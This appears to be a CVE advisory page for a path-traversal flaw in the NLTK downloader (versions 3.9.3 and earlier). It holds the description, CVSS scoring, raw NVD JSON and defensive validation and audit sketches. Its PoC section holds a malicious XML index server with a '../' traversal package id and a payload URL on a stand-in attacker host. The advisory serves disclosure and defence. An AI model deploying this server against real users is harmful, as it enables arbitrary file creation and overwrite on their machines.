Security Vulnerability Report
CVE-2026-33236 CVSS 8.1 HIGH

Published: 2026-03-20 23:16:47
Last Modified: 2026-03-23 19:15:38

Description

NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, the NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. An attacker who controls a remote XML index server can supply values containing path traversal sequences (such as `../`), which can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite. Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a patches the issue.
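To make the missing check concrete, here is a minimal defensive sketch of how a downloader could validate `subdir` and `id` before building a destination path. It is not the code from commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a. The function name `safe_package_path`, the `<download_dir>/<subdir>/<id>.zip` layout, and the rule that both values must be single path components are assumptions made for illustration.

```python
from pathlib import Path


def safe_package_path(download_dir: str, subdir: str, package_id: str) -> Path:
    """Build <download_dir>/<subdir>/<package_id>.zip, refusing any escape.

    Hypothetical helper: the layout and the single-component rule are
    assumptions for this sketch, not NLTK's actual implementation.
    """
    base = Path(download_dir).resolve()

    # First line of defence: each attribute must be one plain path component.
    for name, value in (("subdir", subdir), ("id", package_id)):
        if (
            not value
            or value in (".", "..")
            or "/" in value
            or "\\" in value
            or "\x00" in value
        ):
            raise ValueError(f"unsafe {name} attribute: {value!r}")

    # Second line of defence: the resolved target must stay under the base.
    target = (base / subdir / f"{package_id}.zip").resolve()
    if not target.is_relative_to(base):  # Path.is_relative_to needs Python 3.9+
        raise ValueError(f"path escapes download directory: {target}")
    return target
```

The two checks overlap on purpose: rejecting separators catches the `../` case described above, while the containment check on the resolved path also covers cases the component filter might miss, such as a symlink inside the download directory.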

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
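As a worked check of how the vector maps to the 8.1 score, the sketch below applies the CVSS v3.1 base-score equations to it. It handles only scope-unchanged vectors (`S:U`), which is all this entry needs. The function names `roundup` and `score` are illustrative, and the weights are the published v3.1 metric values.

```python
import math

# Metric weights from the CVSS v3.1 specification (scope-unchanged values only).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def score(vector: str):
    """Return (base score, exploitability, impact) for a scope-unchanged vector."""
    metrics = dict(item.split(":") for item in vector.split("/")[1:])
    if metrics["S"] != "U":
        raise NotImplementedError("this sketch only covers S:U vectors")
    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    base = 0.0 if impact <= 0 else roundup(min(impact + exploitability, 10))
    return base, exploitability, impact


base, exploitability, impact = score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H")
print(base, round(exploitability, 1), round(impact, 1))
```

The sub-scores come out at roughly 2.84 (exploitability) and 5.18 (impact); their sum, about 8.01, rounds up to the base score of 8.1.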

Configurations (Affected Products)

cpe:2.3:a:nltk:nltk:*:*:*:*:*:*:*:* - VULNERABLE
NLTK <= 3.9.3
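A quick way to see whether an environment falls in the affected range is to compare the installed NLTK version against 3.9.3. The sketch below uses only the standard library. The helper names `parse_release` and `is_affected` are hypothetical, and the comparison looks only at the numeric release segment, so pre-release or local version suffixes are ignored. It also assumes that any release numbered above 3.9.3 contains the fix, which this entry does not confirm.

```python
import re
from importlib import metadata

# Last affected release according to this entry (NLTK <= 3.9.3).
LAST_AFFECTED = (3, 9, 3)


def parse_release(version: str) -> tuple:
    """Extract the leading numeric release segment, e.g. '3.9.1' -> (3, 9, 1)."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    parts = tuple(int(p) for p in match.group().split("."))
    # Pad short versions such as '3.9' to three components for comparison.
    return parts + (0,) * (3 - len(parts))


def is_affected(version: str) -> bool:
    """True if the version is at or below the last affected release."""
    return parse_release(version) <= LAST_AFFECTED


if __name__ == "__main__":
    try:
        installed = metadata.version("nltk")
    except metadata.PackageNotFoundError:
        print("nltk is not installed in this environment")
    else:
        status = "in the affected range" if is_affected(installed) else "above 3.9.3"
        print(f"nltk {installed}: {status}")
```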

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Malicious XML Index Server Example (PoC Concept)
# This XML structure demonstrates how to inject path traversal.
import http.server
import socketserver
import xml.etree.ElementTree as ET

PORT = 8000

# Malicious XML payload containing path traversal
MALICIOUS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<nltk_data>
  <packages>
    <package id="../../../../tmp/malicious_payload.txt" subdir="corpora">
      <url>http://attacker-server.com/payload.txt</url>
      <checksum type="sha256">dummy_checksum</checksum>
    </package>
  </packages>
</nltk_data>
"""


class MaliciousHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/xml')
        self.end_headers()
        self.wfile.write(MALICIOUS_XML.encode('utf-8'))
        print("[+] Sent malicious XML index to victim.")


with socketserver.TCPServer(("", PORT), MaliciousHandler) as httpd:
    print(f"[+] Malicious server running at port {PORT}")
    print("[+] Configure NLTK to use this server as an index and trigger download.")
    httpd.serve_forever()

# Victim Side (Conceptual)
# import nltk
# nltk.set_proxy('http://127.0.0.1:8000/index.xml')
# nltk.download('malicious_payload')  # Triggers the traversal
```
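On the defensive side, an index file can be audited for the pattern shown in the PoC before it is trusted. The following sketch scans every `<package>` element and reports `id` or `subdir` attributes that look like traversal attempts. The function names `is_unsafe` and `suspicious_packages` are hypothetical, the heuristics are deliberately simple, and the standard-library XML parser is used for brevity; for untrusted input a hardened parser would be a safer choice.

```python
import re
import xml.etree.ElementTree as ET


def is_unsafe(value: str) -> bool:
    """Heuristic: flag '..' components, absolute paths, and drive-style prefixes."""
    components = re.split(r"[\\/]", value)
    return (
        ".." in components
        or value.startswith(("/", "\\"))
        or ":" in value
    )


def suspicious_packages(index_xml: str) -> list:
    """Return (attribute, value) pairs from <package> elements that look unsafe."""
    root = ET.fromstring(index_xml)
    findings = []
    for package in root.iter("package"):
        for attr in ("id", "subdir"):
            value = package.get(attr, "")
            if is_unsafe(value):
                findings.append((attr, value))
    return findings
```

An empty result does not prove an index is safe; it only means that none of these specific patterns were found in the two attributes named in this advisory.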

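References

https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a - Patch
https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7 - Exploit, Vendor Advisory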

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-33236",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-20T23:16:47.007",
    "lastModified": "2026-03-23T19:15:37.720",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, the NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite. Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a patches the issue."
      },
      {
        "lang": "es",
        "value": "NLTK (Natural Language Toolkit) es un conjunto de módulos Python de código abierto, conjuntos de datos y tutoriales que apoyan la investigación y el desarrollo en Procesamiento del Lenguaje Natural. En las versiones 3.9.3 y anteriores, el descargador de NLTK no valida los atributos 'subdir' e 'id' al procesar archivos de índice XML remotos. Los atacantes pueden controlar un servidor de índice XML remoto para proporcionar valores maliciosos que contengan secuencias de salto de ruta (como '../'), lo que puede llevar a la creación arbitraria de directorios, creación arbitraria de archivos y sobrescritura arbitraria de archivos. El commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a corrige el problema."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-22"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:nltk:nltk:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "3.9.3",
                "matchCriteriaId": "E3C35863-7D82-4EEF-BDE8-E94C559CF4FB"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```